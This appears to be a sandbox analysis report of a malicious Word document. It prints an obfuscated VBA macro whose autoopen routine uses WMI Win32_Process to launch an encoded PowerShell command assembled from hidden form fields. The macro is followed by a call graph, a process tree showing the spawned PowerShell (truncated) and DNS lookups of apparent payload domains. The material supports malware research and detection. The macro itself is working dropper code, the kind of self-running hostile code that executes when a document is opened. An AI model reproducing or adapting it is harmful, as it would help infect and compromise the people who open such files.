            'national card Rubber Flat Idaho next-generation Refined Wooden Computer Hollow Turnpike infrastructure
            c30861c90960 = Atn(c206b353066)
            'Investment Account Web panel Trail whiteboard Dalasi Tasty
         Case b000003x5545x
         'Shoal hack yellow solution deploy infrastructures
            x1xx89806039 = b2b9470b00x3
            'Mississippi synthesizing global Serbia Gorgeous Cotton Shoes indexing
            c7xxb018661 = x105c14013088
            'synthesize SMTP Handmade Soft Keyboard payment Gateway US Dollar Handmade Wooden Hat Phased Way
         Case x2037300028
         'Generic Cotton Ball copy Corporate empower paradigm extensible Developer
            c9663800x20b = ChrW(b22442c4260)
            'multi-tasking 24/365 back-end Tasty Metal Gloves Money Market Account fuchsia Ergonomic PNG withdrawal Total Analyst intangible
            x2cc6xxb5013 = x10b10b395010
            'B2B Strategist connecting cross-platform Optional Distributed
      End Select
      'cyan content Kazakhstan payment Operations Ergonomic Fresh Towels
      bx80b970c4b9 = Atn(bxb45013488)
      'Developer Berkshire Dong Plastic optical Health, Movies & Beauty bluetooth Zimbabwe Dollar Nepalese Rupee bus cross-platform Spain payment
      b922c08x9760b = Hex(c9cc0c14004)
'open-source GB local area network Unbranded transmitting optimize Senior Michigan mobile Corners Fresh revolutionary Frozen
b491104015b07 = Replace(c60xbxxb86403, c6x004870b2x6, "")
   'Switchable deposit Small Granite Chicken Music & Toys Sleek Cotton Salad optical Credit Card Account New Leu forecast Nevada Organic Underpass Forward Garden & Computers
c8002bc9580 = False
'secondary withdrawal Savings Account Unbranded Plastic Bike primary Ethiopian Birr Sleek Borders Organic Kansas Point solid state
cc09047856348 = "background card South Dakota Rustic Rubber Chips Gorgeous Steel Hat Knoll Shoes & Music"
'CSS cross-platform back-end Licensed UIC-Franc integrate Oklahoma Usability Small Metal Chips Operations Checking Account sticky Buckinghamshire Liaison
      cx0109bx50x8 = x490062076b07 - b8040c22x9c1
      'array Dynamic Home productize Garden, Health & Clothing Checking Account
      Select Case c03c10309002
      'Quetzal North Carolina Adaptive payment Fantastic Rubber Chicken Books
         Case bb0c4601x2b0
         'transparent North Carolina bifurcated International THX primary Money Market Account Camp
            c192c109093 = c0x89000000
            'Global Open-architected Intelligent Plastic Salad hardware Sleek Metal Shoes Money Market Account parsing deliver Senior redefine
            b79bx502b625 = Atn(b93c082b2x740)
            'multi-byte deposit View Practical Rubber Gloves deposit calculate GB Borders transparent Administrator
         Case c30568c0980
         'Fantastic Steel Table Profound Senior Fresh Concrete hard drive Gabon Inlet
            c40c7b1c78cc2 = c5880x2c506
            'infomediaries National online Hawaii Concrete Gorgeous Metal Towels Coordinator Illinois Supervisor
            c75003301509 = x8831b012x1
            'Iceland Krona Nebraska gold Sleek Fresh Ball Savings Account Adaptive solutions Rwanda Parks TCP Ohio Games, Toys & Computers vertical
         Case b12cx09401130
         'dynamic Prairie Tools Frozen web-readiness service-desk Throughway Music, Clothing & Outdoors bluetooth Coves invoice
            bx000xx6083c = ChrW(x59050902901)
            'EXE moratorium Forges Idaho transition navigate initiatives Rubber Savings Account calculating
            b4020402c10 = c4697x090555
            'US Dollar Refined Cotton Shoes Minnesota Polarised FTP Officer static virtual Data quantify
      End Select
      'Visionary Grass-roots Mauritius Rupee override Home Marketing navigate Bedfordshire Developer Tasty
      b9cx040x48x11 = Atn(x507406002c)
      'matrix Berkshire Universal scalable contingency Tasty Wooden Salad Generic Wooden Cheese Movies, Toys & Kids Small Steel Shoes Berkshire Tasty Generic Mall
      c06088160c15 = Hex(x0940285x600)
'Consultant Baby & Health repurpose Intelligent Frozen Chair SSL RAM Public-key functionalities Fantastic Cotton Gloves violet
   'online Expanded Paradigm Indonesia Refined Wooden Gloves architect Vatu Squares Small Rubber Bike Cambridgeshire interface
cbc1c8607062 = True
'Progressive model cross-media composite invoice Buckinghamshire multi-tasking Kuwait Small Steel Sausages e-business Focused calculate Diverse generating
cc09047856348 = "Engineer Mali Refined Sleek Berkshire Toys cross-platform haptic grow Wooden Village primary Practical Steel Pizza sensor"
'Fantastic Wooden Salad Enterprise-wide pixel Iranian Rial Nebraska Personal Loan Account Generic Granite Sausages Executive calculating
      x061c763809 = b69b0107x40cb - x630b0009706
      'Yen Kansas sensor Music & Baby reboot Consultant Cambridgeshire Rubber transmit input Personal Loan Account customized
      Select Case b2608c2007b6
      'District Executive HDD Money Market Account payment cultivate
         Case b7xx4bxc502
         'Fiji Greens system-worthy synthesize Markets Awesome Soft Shirt proactive Usability calculate Assistant Nevada
            b06x8918b544 = b9997404c70
            'synergies override turn-key Soft Costa Rica Sleek Concrete Shoes Buckinghamshire Generic Frozen Hat Graphic Interface
            x208689902740 = Atn(bc7850849c97)
            'infrastructure intermediate repurpose Legacy Quality driver AGP Generic B2C explicit Awesome
         Case c0170042000
         'next-generation RSS Avon Bedfordshire backing up Ameliorated Guinea Franc
            b5c20x3000c7 = cb60xb7b2400
            'Forward foreground synthesizing Implemented hack Extension payment neural-net User-centric bricks-and-clicks Cotton Bond Markets Units European Composite Unit (EURCO) azure modular
            x3901610700 = x0xx002612b
            'calculating optical Squares Metical Refined Granite Gloves holistic Handcrafted SQL
         Case c3c05082881
         'iterate Jewelery open system Liaison Avon reinvent Applications Home Loan Account Shoes & Kids transmitting alarm
            b40580603123 = ChrW(x6xx7cx8000)
            'strategize Games & Garden Supervisor Customer engage CFP Franc Avon Port Networked Rwanda Franc Summit
            cx710974089 = x46b0489598
            'Kuwaiti Dinar Incredible Wooden Chicken Australia interface metrics Kwacha Liaison Incredible
      End Select
      'function Small bypassing HDD Baby User-friendly invoice Handcrafted Soft Ball invoice Automated
      x306x830799x = Atn(x92024508c00)
      'global Awesome Rubber Table Handcrafted Steel Shirt 24/365 ivory payment Architect Oman groupware Awesome protocol Sweden Synergistic content
      b4308c61738b2 = Hex(b0b3030103cc)
'Incredible Soft Cheese Ouguiya bifurcated Designer South Dakota Money Market Account Investment Account
End Function
Sub autoopen()
   'Home grey Pennsylvania Corporate Station Washington
b077225032x07 = False
'maroon Vision-oriented FTP JBOD Human Extension visualize program task-force Landing Fresh Awesome blue Mongolia
cc09047856348 = "COM Handmade Dominican Peso back-end transparent capacitor connect"
'Gorgeous backing up Facilitator Associate SMTP innovative
      cxc07000c0882 = x64557691b0 - bc1bbc00700b
      'cross-platform monitoring neural open-source Incredible wireless Avon Investor Republic of Korea tan
      Select Case b787c11x64b52
      'payment bus US Dollar Handcrafted Squares Won incubate content quantifying Music, Health & Garden index Awesome Fresh Sausages
         Case c87344x067b
         'mesh content indexing Generic Cotton Sausages Ridges Handcrafted Plastic Tuna harness Legacy Buckinghamshire indexing explicit Incredible Frozen Table North Carolina
            b054b7bb750 = b80x80867b29
            'next generation white zero defect Botswana Self-enabling scale
            b0bxb4049083 = Atn(x3c0bb04x60)
            'communities Assistant Ergonomic Steel Bacon deposit Borders matrix
         Case cx8c8cb8165
         'turquoise service-desk deposit productize Locks Avon niches neural
            bx00321732068 = x07b0313x0x1
            'Northern Mariana Islands partnerships Tools morph PCI back up teal Home Loan Account responsive Licensed Cotton Keyboard
            x09b1805cc8x = c98026840305
            'viral Buckinghamshire Ghana Developer deposit COM digital Personal Loan Account Ergonomic Frozen Towels calculate
         Case cb3b713524418
         'Personal Loan Account contextually-based connecting Rubber parse Sleek Handmade Rubber Bike Senior complexity Dobra Generic Cotton Table National invoice Internal
            b400073bx0b9 = ChrW(bc9517b0751b3)
            'visualize firewall Ethiopia Berkshire Arkansas Triple-buffered Bedfordshire Fresh e-business cyan logistical
            bx0c950c83c = xc56960290407
            'Agent bluetooth navigating Auto Loan Account Data Gorgeous Wooden Pants Clothing Home Loan Account quantifying Home Loan Account Customer-focused Incredible Shoes, Jewelery & Books
      End Select
      'Square bus CFA Franc BEAC Centers 1080p Cotton overriding Handmade Fresh Shirt salmon Graphic Interface Identity
      x701005016044 = Atn(xxbb5509306)
      'mesh Saint Barthelemy Generic CSS Baby turn-key Incredible Fresh Mouse Antarctica (the territory South of 60 deg S) RSS Fantastic
      x52c0c0x708c0 = Hex(c0c6279305c)
'Chief Connecticut Marshall Islands Re-contextualized fuchsia interactive Fantastic Metal Chips cyan Markets multi-byte back-end Bulgarian Lev seize cross-platform
   'Unbranded clear-thinking Auto Loan Account Lesotho expedite virtual Mission neural-net Practical Granite Hat parsing Puerto Rico Harbor Cotton content
ccc900170c080 = True
'gold Creative sensor Visionary circuit River French Guiana Mission Incredible Fresh Chair Human
cc09047856348 = "Future Colorado back-end Grove Bahraini Dinar Unbranded"
'Way maximize transmit Estate pixel Rustic
      c0560630c64 = c0668000980bx - b504c029c24
      'Bedfordshire Ergonomic Wooden Bacon Investment Account Fiji Branding migration Metal content
      Select Case xx15850b83x0
      'grey Home Loan Account generating Awesome Granite Chair Row Gorgeous Concrete Shirt Checking Account syndicate Fresh Buckinghamshire initiatives Handmade Plastic Keyboard
         Case x29505b388xx
         'Surinam Dollar copy models Turks and Caicos Islands architectures Investor mobile neural Metal Cambridgeshire
            x32152695247 = cc051615506
            'Supervisor success encryption XSS Handcrafted Granite Table maroon software
            c464781x3b05 = Atn(x04x3cx650702)
            'Accountability RSS International Hryvnia Mission Terrace THX Fantastic Concrete Table Handmade Cotton Salad Executive generating
         Case c5979730000b
         'input Grocery & Outdoors compelling overriding back up Engineer infrastructure productivity
            xb06707x0c96 = c0040557x0030
            'Kwanza Sleek Rubber Keyboard ivory Persevering paradigms PNG Money Market Account Usability primary Handmade Turks and Caicos Islands
            x5b005972840 = b01c51x0517b4
            'transmit Savings Account Cambridgeshire experiences Field schemas El Salvador Unbranded Plastic Chicken payment Rhode Island clicks-and-mortar expedite virtual
         Case b2x96698654
         'deposit US Dollar Brunei Darussalam application Cambridgeshire even-keeled Practical Granite Chicken transparent wireless reboot redundant
            b05580509c5 = ChrW(x0030x869442)
            'Licensed Cotton Chair Borders transmitting Arkansas fault-tolerant Jamaica functionalities
            c188xc9690c = bb0b6x0200c7
            'Ireland e-tailers empower Common open architecture payment bluetooth Pennsylvania solutions International input
      End Select
      'static Practical Soft Computer blue Unbranded Granite Table Fantastic Granite Shoes Electronics, Computers & Clothing mobile 3rd generation Global
      c93b13079x65 = Atn(c1x146x402012)
      'Zambia Open-source New York back-end Florida Optimization Cambridgeshire Operative driver
      b6x89x0380c = Hex(b07b516600104)
'grow teal Future Granite Avon Cambridgeshire AI COM Burundi Franc Regional Data architect Director Gorgeous
b2c005x3394
   'Iceland Krona Bedfordshire Enterprise-wide Investment Account encoding Tasty paradigms Soft
b051000b24426 = True
'payment internet solution Personal Loan Account yellow Money Market Account Generic Tasty Organic Refined Soft Computer Idaho
cc09047856348 = "Credit Card Account index foreground Agent Agent payment Kansas Awesome Rubber Cheese grey Auto Loan Account"
'Small Cotton Gloves Sleek Fresh Hat Ameliorated Managed Generic Soft Bike invoice Metal leverage
      b5x340b9200 = b9b3c046709 - x91770201300
      'Central functionalities Myanmar Ameliorated Corporate Auto Loan Account Buckinghamshire Unbranded Plastic Shoes Practical Metal Tuna enable
      Select Case b113008972x
      'fault-tolerant redundant Cotton Triple-buffered Cambridgeshire Fresh Direct Home yellow Licensed Plastic Keyboard Clothing Ports
         Case c707220936920
         'invoice Bedfordshire Plastic deposit optical EXE
            x3259902360 = bc06516430776
            'Assurance incremental Savings Account Health hacking Borders firmware Engineer
            c5xb2761x74 = Atn(x5x61b317109c)
            'override experiences Forest Missouri calculating Investment Account AI Bedfordshire Course Small Investment Account Computers, Electronics & Sports auxiliary transmit
         Case b901586068010
         'Technician Senior Investment Account Islands Buckinghamshire Grocery, Tools & Shoes
            cxc8x09x440xb = bc099301720
            'Land deposit Implementation silver Hills Handmade Metal Shirt deliverables
            c30629206580 = b067573294b17
            'Causeway Branding mobile transparent parsing alarm methodical Home Loan Account
         Case b3221cb6494x3
         'initiative Knoll Fresh multi-byte synthesize paradigm Buckinghamshire Principal Tasty Rubber Fish
            x00834b82x17 = ChrW(bbcc00b48753)
            'Saint Martin Communications Refined Plastic Chips Borders Zimbabwe Dollar Malaysian Ringgit
            cb704b13309 = c01x75b08104
            'channels auxiliary payment Function-based RAM Kina
      End Select
      'robust Handmade Rubber Gloves Music, Beauty & Toys Director intermediate hacking silver access
      cb2cxb00151c = Atn(x0156444570)
      'National microchip Industrial Bedfordshire IB Division Ecuador International Coordinator Assistant
      x20975641x0 = Hex(b090050000x3)
'Cambridgeshire Auto Loan Account Yen Fantastic Concrete Chicken Cotton Investment Account array New Hampshire Tools
   'Dynamic driver Legacy synergy eyeballs Money Market Account
x393657c02388 = True
'violet Cliff harness Chief Tasty Handmade Granite Bacon Sleek Rubber Keyboard action-items Regional Idaho Forward bluetooth sensor connect
cc09047856348 = "Barbados synergies data-warehouse white Wooden throughput Zimbabwe Avon Pa'anga global open-source"
'schemas CSS Awesome Rubber Ball orchid olive Multi-lateral paradigms orange Directives Self-enabling
      b2707306033 = bbc04703040 - x90790463b04
      'Generic capacitor next generation Usability Sleek Metal Bike payment Wooden Rubber Vatu International
      Select Case x00x12370b51
      'transmit back up Guarani Brooks moderator Generic Metal Ball Bedfordshire service-desk core
         Case c80901129173
         'Buckinghamshire Strategist neural Direct pink Berkshire AI
            xx4501070487x = cb50b092b53c0
            'programming Gorgeous Steel Ball embrace red blue Internal Personal Loan Account solution Ohio Cloned
            b057509x406b9 = Atn(bc95xcc5904)
            'synthesizing Total sensor mobile Handcrafted Metal Gloves Parks Small auxiliary FTP
         Case c5bx71x0c5x
         'Cambridgeshire wireless HTTP Bedfordshire Jewelery & Electronics Handmade Steel Pants Toys
            xbb6900xcc43x = b98xb4x0966
            'SQL fuchsia Berkshire Land Licensed Concrete Car Solomon Islands HDD JBOD Afghanistan deposit Cambridgeshire Togo
            x1996xxx4115 = c2987905400
            'Cambodia withdrawal protocol withdrawal Supervisor asynchronous focus group model
         Case x13xc6400580
         'relationships pixel framework bottom-line grey Avon IB digital distributed indexing quantify Intelligent Cotton Chair transmitting integrated
            x0657cbc7x00 = ChrW(c0098500x1x0)
            'deposit Kwanza Personal Loan Account User-centric Curve XML framework Mountains Crest Balanced synthesize
            c0x071760348 = b3c190x170c66
            'Syrian Arab Republic IB Borders white Michigan redundant Lari Summit
      End Select
      'Streamlined Coordinator Developer Fords neutral Auto Loan Account Rapids Money Market Account Clothing, Sports & Games connect monitor seamless infomediaries SMTP
      x4877200x37x2 = Atn(bxxb19x01069)
      'artificial intelligence program markets innovate virtual payment program revolutionize
      bx817709x07 = Hex(x0c993b7c65c)
'SAS Iran pixel River Berkshire Profit-focused Checking Account Awesome Cotton Chair out-of-the-box invoice teal Savings Account EXE Bedfordshire
End Sub
VBA Filename b4228986062c0.bas Extracted Macro
Function b2c005x3394()
On Error Resume Next
   'Road invoice Berkshire moderator Virgin Islands, British Direct Savings Account Maine
b81xc200951c = True
'port Future Freeway Chief Park Island Progressive backing up data-warehouse invoice Cambridgeshire Lakes
cc09047856348 = "Awesome Concrete Computer background relationships Garden Dynamic Networked Incredible Soft Chicken Up-sized parsing"
'networks Fresh copying Rhode Island SCSI Malagasy Ariary
      x300312c3049x = b37x50279b7x - c3983bc9991c4
      'Refined Steel Bacon Liberian Dollar Small Frozen Chips calculate synthesizing Future-proofed Consultant Credit Card Account Flat maroon Coordinator 6th generation
      Select Case b420c1c7c20x
      'Technician paradigms Poland Expressway 24 hour Shoes, Jewelery & Books Cliff Armenia
         Case c0102858x80
         'Rustic Concrete Cheese Intelligent Sports, Baby & Baby compressing yellow Gorgeous Rubber Fish Ergonomic value-added Tasty reboot PNG
            b002501b92cc9 = b45b4700x2c80
            'ivory implementation one-to-one Data Product haptic quantify New Caledonia Handmade Granite Tuna transmit copying
            b083593x4x60 = Atn(x07b0b819b19)
            'functionalities Bermudian Dollar (customarily known as Bermuda Dollar) Soft virtual Rustic Metal Sausages viral Metrics Gorgeous Plastic Ball Investor out-of-the-box Japan auxiliary one-to-one
         Case c322c38c53b01
         'Outdoors & Automotive Practical Granite Bacon deposit Applications maximize Planner protocol haptic Borders Parkways Buckinghamshire Village Rapid
            x0805x677c0 = x7b908xx0209
            'Industrial & Automotive Gorgeous Steel Pants instruction set Berkshire Forest killer Re-engineered reboot Frozen indigo firewall Paradigm Bedfordshire
            x10003c917049 = cc2810023172x
            'generating Visionary Generic Berkshire Roads West Virginia Finland Rustic Dynamic
         Case cc8c2473x326
         'Assimilated Texas Handcrafted Rubber Chair Concrete Generic Plastic Fish HTTP Bond Markets Units European Composite Unit (EURCO) Generic Handmade Frozen Bacon analyzer reinvent
            c3062xc6x703 = ChrW(b2xb48080614)
            'Cambridgeshire pixel Roads Practical invoice interfaces Club Bedfordshire scalable applications
            x304605070914 = x20500031c8
            'Practical Rubber Mouse Incredible Steel Hat Licensed Colorado framework Costa Rica
      End Select
      'Borders Generic Metal Table visualize Borders Ergonomic Concrete Chicken Latvia Home Loan Account Steel
      b5200329860 = Atn(c824c256813)
      'internet solution Indiana payment iterate e-tailers application Indiana
      x50920b21c5 = Hex(x0549b39xcb0)
'wireless transmitter plum Unbranded Metal Hat Small Plastic Shirt Centralized Buckinghamshire Multi-lateral XSS Automotive, Music & Movies Bedfordshire white Sleek Facilitator
x86207380b664 = b491104015b07("p" + x7201320x00.x430489957x + x7201320x00.b80230b09208) '
   'calculating virtual Afghanistan applications Ergonomic Rubber Ball Branding next-generation South Georgia and the South Sandwich Islands Fantastic SMS Accountability Sleek
xc071945370 = False
'North Carolina French Guiana Sleek Plastic Towels e-services withdrawal Kip Avon Developer secured line Fresh National port engage
cc09047856348 = "Liaison solid state Adaptive Skyway bricks-and-clicks Rustic Frozen Shirt Advanced green"
'Metal Forward port Iowa unleash panel
      cc42c0609320 = x500130104827 - x04173b2158c
      'Spurs Metal Iowa Oklahoma Reactive Shoes, Computers & Baby
      Select Case c976b2x69918
      'fuchsia quantify Corporate deposit synthesize maroon Guinea-Bissau Web Kwanza purple zero tolerance Sharable Applications
         Case x804137700b
         'Cambridgeshire e-commerce Small Granite Soap deploy Savings Account parsing Web integrate
            x756c89b8x0 = b7x8x000277
            'e-enable Home & Movies cross-media Arkansas channels Personal Loan Account Investment Account Tanzanian Shilling panel Cayman Islands Chief
            c020049c002cx = Atn(x37b0c90610c6)
            'Analyst Analyst teal Proactive Savings Account Circles Cove
         Case c021090013000
         'Kentucky homogeneous Berkshire mint green calculating Maryland background SSL Costa Rica
            b00x90x640c09 = x10004001b2
            'Executive engineer Refined Berkshire synthesizing Massachusetts Borders Planner fresh-thinking TCP Lithuanian Litas transmitter withdrawal Data
            cb3029902660 = c580c11b600
            'Research interface Nakfa Incredible input Managed
         Case bb8055802428
         'Liaison Michigan Investment Account green bandwidth indexing
            xx94x0cx472c2 = ChrW(b4x63c877b535)
            'target Liberia incubate Soft International scale Clothing Monitored invoice
            bbc30x06001 = x7216c9x1c797
            'Florida Canyon Virginia challenge asynchronous District
      End Select
      'directional 3rd generation lime Ways plum Mount process improvement
      x7885421x01 = Atn(c10c806002030)
      'navigating Ridge Intranet bus extranet Division Planner Fantastic
      c6847911c6x = Hex(b2326xc035x70)
'SMS Music Shores Awesome Granite Pizza payment Assurance Legacy bypass SMS Connecticut monitoring Wells Security
x009982c49963 = c74b1x3000000 'monitor Jewelery, Shoes & Shoes Angola withdrawal withdrawal Practical Soft Computer
Set x07608201094 = CreateObject(b491104015b07(b491104015b07(CStr(567066 + 50 - 567066) + "50505050w50inm50505050g50mt50505050s50:W50505050in3250505050_Pr505050oc505050e50505050505050505050ss505050")))
x009982c49963 = x009982c49963 + x07608201094.Create((x86207380b664), c0077498010, x90933c0328, x8c9407c509)
   'pink Checking Account Danish Krone Comoros Lempira Ohio Credit Card Account Station Licensed Soft Pizza bus lavender
x76098295465 = False
'models Metal Intuitive models New Hampshire Profit-focused robust Sleek Granite Fish Fantastic Sharable methodologies Internal Horizontal Personal Loan Account
cc09047856348 = "granular Handcrafted Rubber Chips Licensed Specialist Internal Steel schemas Cambridgeshire copy value-added"
'transmit hard drive attitude navigate Small Wooden Chicken Up-sized Borders Causeway infomediaries transmitter Berkshire
      b0452c1b473b = c014c0346385 - x2261c91600
      'Iraqi Dinar Court incentivize Money Market Account Kentucky Louisiana Program invoice
      Select Case cc0879009cc
      'Music & Outdoors system indexing protocol Peru SMTP well-modulated
         Case bc3x0090xc2
         'focus group XSS North Dakota Grocery, Shoes & Music AI Metal portals Prairie Handcrafted Rubber Tuna Optimized
            c77146673178x = b2bc100705xx
            'Licensed Oregon Central HTTP Canyon Savings Account system distributed Multi-layered
            c08090315970 = Atn(c949bc40xc7)
            'Specialist Research Ergonomic Wooden Gloves synergies Plastic monitor Investment Account Trail
         Case x9046714200
         'Dale France secondary primary Gorgeous deposit intranet Course invoice Vista Investment Account
            x10365108cb20 = x062902692bc6
            'Home Loan Account Refined Frozen Ball superstructure Gibraltar Architect Ergonomic Frozen Chicken Rustic Plastic Car
            c7320c097b02 = cc89113468x0
            'Baby, Tools & Clothing Street Checking Account Trinidad and Tobago Dollar Bedfordshire Designer Future transition San Marino
         Case x529cx35070
         'ivory value-added navigating enable Facilitator Ports Kazakhstan solid state deposit bleeding-edge
            x010700xc55 = ChrW(x4b820508c0b)
            'Uzbekistan Sum haptic Bedfordshire Awesome Steel Table Falkland Islands Pound virtual primary dynamic CSS
            x11x040b530 = cb0004090413x
            'Manors Refined Plastic Pizza firewall matrix Georgia Bahamas Incredible Assistant
      End Select
      'New York gold Sleek mint green SSL payment Green capability Manager parse Generic Granite Tuna backing up XML
      b04058900580 = Atn(c0000899c09)
      'monitor Multi-channelled Awesome overriding Technician deliver
      x0080b769000 = Hex(xx6c5460836)
'deposit Analyst JBOD morph PCI Refined Alabama Personal Loan Account Awesome Frozen Chair
End Function

Vba2Graph

Nodes:
x90933c0328: ChrW[6], .Show[1], Int[2], Hex[6], CreateObject[1], Chr[1]
b491104015b07: ChrW[8], Int[2], Hex[8], Replace[1]
autoopen: ChrW[4], Hex[4]
b2c005x3394: ChrW[3], Int[1], Hex[3], CreateObject[1], .Create[1], CStr[1]
Edges:
x90933c0328->b491104015b07
autoopen->b2c005x3394
b2c005x3394->x90933c0328
b2c005x3394->b491104015b07
JExif
b0c201019x10xb99176785080cc48047046210
ontextualized
d Becker
Erdman
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
c30c84637030
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
50o50w50e50r50s50h50e50l50l50 50-50e50n50c50o50
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
bc05060x8c8o
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Calibri
50w50i50n50m50g50m50t50s50:50w50i50n50350250_50p50r50o50c50e50s50s50s50t50a50r50t50u50p
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
cx9x900080049.1
Calibri
Normal.dotm
Microsoft Office Word
Arjun Flatley
Small Soft Towels
Japan
Delmer Reichert
Title
x9060037c40, 0, 0, MSForms, TextBox#
b083b090040, 1, 1, MSForms, TextBox$
b80230b09208, 2, 2, MSForms, TextBox%
cb0x00141x242, 3, 3, MSForms, TextBox#
x430489957x, 4, 4, MSForms, TextBox$
grow teal Future Granite Avon Cambridgeshire AI COM Burundi Franc Regional Data architect Director Gorgeous
Iceland Krona Bedfordshire Enterprise-wide Investment Account encoding Tasty paradigms Soft
payment internet solution Personal Loan Account yellow Money Market Account Generic Tasty Organic Refined Soft Computer Idaho
Credit Card Account index foreground Agent Agent payment Kansas Awesome Rubber Cheese grey Auto Loan Account'
Small Cotton Gloves Sleek Fresh Hat Ameliorated Managed Generic Soft Bike invoice Metal leverager
Central functionalities Myanmar Ameliorated Corporate Auto Loan Account Buckinghamshire Unbranded Plastic Shoes Practical Metal Tuna enable
fault-tolerant redundant Cotton Triple-buffered Cambridgeshire Fresh Direct Home yellow Licensed Plastic Keyboard Clothing Portst
invoice Bedfordshire Plastic deposit optical EXE"
Assurance incremental Savings Account Health hacking Borders firmware Engineer2
override experiences Forest Missouri calculating Investment Account AI Bedfordshire Course Small Investment Account Computers, Electronics & Sports auxiliary transmitC
Technician Senior Investment Account Islands Buckinghamshire Grocery, Tools & Shoes
Land deposit Implementation silver Hills Handmade Metal Shirt deliverables
Causeway Branding mobile transparent parsing alarm methodical Home Loan Account
initiative Knoll Fresh multi-byte synthesize paradigm Buckinghamshire Principal Tasty Rubber Fish
Saint Martin Communications Refined Plastic Chips Borders Zimbabwe Dollar Malaysian Ringgit
channels auxiliary payment Function-based RAM Kinan
robust Handmade Rubber Gloves Music, Beauty & Toys Director intermediate hacking silver accessr
National microchip Industrial Bedfordshire IB Division Ecuador International Coordinator Assistant
Cambridgeshire Auto Loan Account Yen Fantastic Concrete Chicken Cotton Investment Account array New Hampshire Tools
Dynamic driver Legacy synergy eyeballs Money Market Account
Barbados synergies data-warehouse white Wooden throughput Zimbabwe Avon Pa'anga global open-source'
schemas CSS Awesome Rubber Ball orchid olive Multi-lateral paradigms orange Directives Self-enablingi
Generic capacitor next generation Usability Sleek Metal Bike payment Wooden Rubber Vatu International
transmit back up Guarani Brooks moderator Generic Metal Ball Bedfordshire service-desk core
Buckinghamshire Strategist neural Direct pink Berkshire AI
programming Gorgeous Steel Ball embrace red blue Internal Personal Loan Account solution Ohio Clonedr
synthesizing Total sensor mobile Handcrafted Metal Gloves Parks Small auxiliary FTP
Cambridgeshire wireless HTTP Bedfordshire Jewelery & Electronics Handmade Steel Pants Toys
SQL fuchsia Berkshire Land Licensed Concrete Car Solomon Islands HDD JBOD Afghanistan deposit Cambridgeshire Togo
Cambodia withdrawal protocol withdrawal Supervisor asynchronous focus group model
relationships pixel framework bottom-line grey Avon IB digital distributed indexing quantify Intelligent Cotton Chair transmitting integrated
deposit Kwanza Personal Loan Account User-centric Curve XML framework Mountains Crest Balanced synthesize
Syrian Arab Republic IB Borders white Michigan redundant Lari Summit0
Streamlined Coordinator Developer Fords neutral Auto Loan Account Rapids Money Market Account Clothing, Sports & Games connect monitor seamless infomediaries SMTP
artificial intelligence program markets innovate virtual payment program revolutionize:
SAS Iran pixel River Berkshire Profit-focused Checking Account Awesome Cotton Chair out-of-the-box invoice teal Savings Account EXE Bedfordshire"
This file is not on VirusTotal.

Process Tree

  • WINWORD.EXE 1224 "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q
  • explorer.exe 1632
  • svchost.exe 564 C:\Windows\system32\svchost.exe -k DcomLaunch
    • WmiPrvSE.exe 2760 C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      • powershell.exe 2348 powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADA ...(truncated)
    • WmiPrvSE.exe 2932 C:\Windows\system32\wbem\wmiprvse.exe -Embedding
  • taskhost.exe 2436 "taskhost.exe"

WINWORD.EXE, PID: 1224, Parent PID: 2480
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q
splwow64.exe, PID: 3012, Parent PID: 1224
Full Path: C:\Windows\splwow64.exe
Command Line: C:\Windows\splwow64.exe 12288
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
svchost.exe, PID: 564, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k DcomLaunch
WmiPrvSE.exe, PID: 2760, Parent PID: 564
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
powershell.exe, PID: 2348, Parent PID: 2760
Full Path: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
Command Line: powershell -enco ...(truncated)
WmiPrvSE.exe, PID: 2932, Parent PID: 564
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -Embedding
taskhost.exe, PID: 2436, Parent PID: 460
Full Path: C:\Windows\sysnative\taskhost.exe
Command Line: "taskhost.exe"

Hosts

Direct IP Country Name
Y 8.8.8.8 United States

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53
192.168.35.21 65426 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.skullbali.com
cheematransxpressinc.com
aceontheroof.com
www.dgxbydamonique.com
aaplindia.com

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR7204.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR7204.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
